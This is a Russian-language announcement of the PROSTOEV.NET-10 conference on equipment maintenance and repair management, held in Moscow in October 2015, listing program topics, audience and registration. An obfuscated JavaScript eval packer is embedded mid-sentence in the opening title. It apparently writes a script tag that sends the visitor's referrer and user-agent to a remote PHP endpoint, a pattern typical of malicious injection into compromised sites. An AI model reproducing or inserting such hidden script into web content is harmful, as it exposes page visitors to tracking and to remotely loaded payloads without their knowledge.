

10-я eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!".replace(/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('b'+e(c)+'b','g'),k[c])}}return p}('0.6(");n m="q";,30,30,'document||javascript|encodeURIComponent|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|script|eyhes|var|u0026u|referrer|srdzy||js|php'.split('|'),0,{})) межотраслевая конференция PROSTOEV.NET-10 «Актуальные вопросы, методологии и опыт проектов управления процессами ТОиР» состоится 28-30 октября 2015 г.



В этом году организаторы постарались сделать доступным мероприятие за счет уменьшения стоимости, переноса в Москву и добавления интернет-трансляции - участие специалистов теперь возможно без отрыва от производства. Кроме этого, в день приезда в Москву накануне конференции 27 октября участники конференции смогут посетить выставку - NDT Russia, а 30 октября поучаствовать в экскурсии на завод.

[Prostoev.NET](#) - информационно-образовательный проект в области Управления надежностью, техническим обслуживанием и ремонтами технических систем и оборудования с 10 летним опытом разработки и реализации методологий в этой области.

[Участие в конференции](#) - это уникальная возможность получить всю информацию по эффективной организации ТОиР в одном месте. Девиз конференции: Снижение простоев к нулю!

Организаторы продолжают традицию номинирования, в этот раз будут номинированы команды проектов «Лучшая команда по ТОиР» с последующим награждением призами.

Участники: главные инженеры, механики, метрологи, энергетики, специалисты отделов внедрения АСУ ТОиР, менеджеры проектов.

[Программа конференции](#) построена на обсуждении конкретных вопросов, проблем, путей их решения, опыта проектов в различных областях ТОиР, направленных на снижение простоев оборудования: Как описать объект? Как выбрать подходы к ТОиР? Как спланировать людей, ТМЦ, сроки для работ? Как организовать эффективное взаимодействие с подрядчиками на работы? Как оценить техническое состояние оборудования и предвидеть отказ? Где посмотреть удачный опыт реализации проекта? Как автоматизировать деятельность по управлению ТОиР? Как развивать и мотивировать персонал качественно выполнять работы? Как найти баланс между планами производства и ремонтов для обеспечения максимальной эффективности оборудования? Как оценить качество организации и выполнения работ по ТОиР? Как организовать закупку и хранение необходимых ТМЦ для выполнения работ?

Подробности и регистрация на сайте – <http://prostoev.net>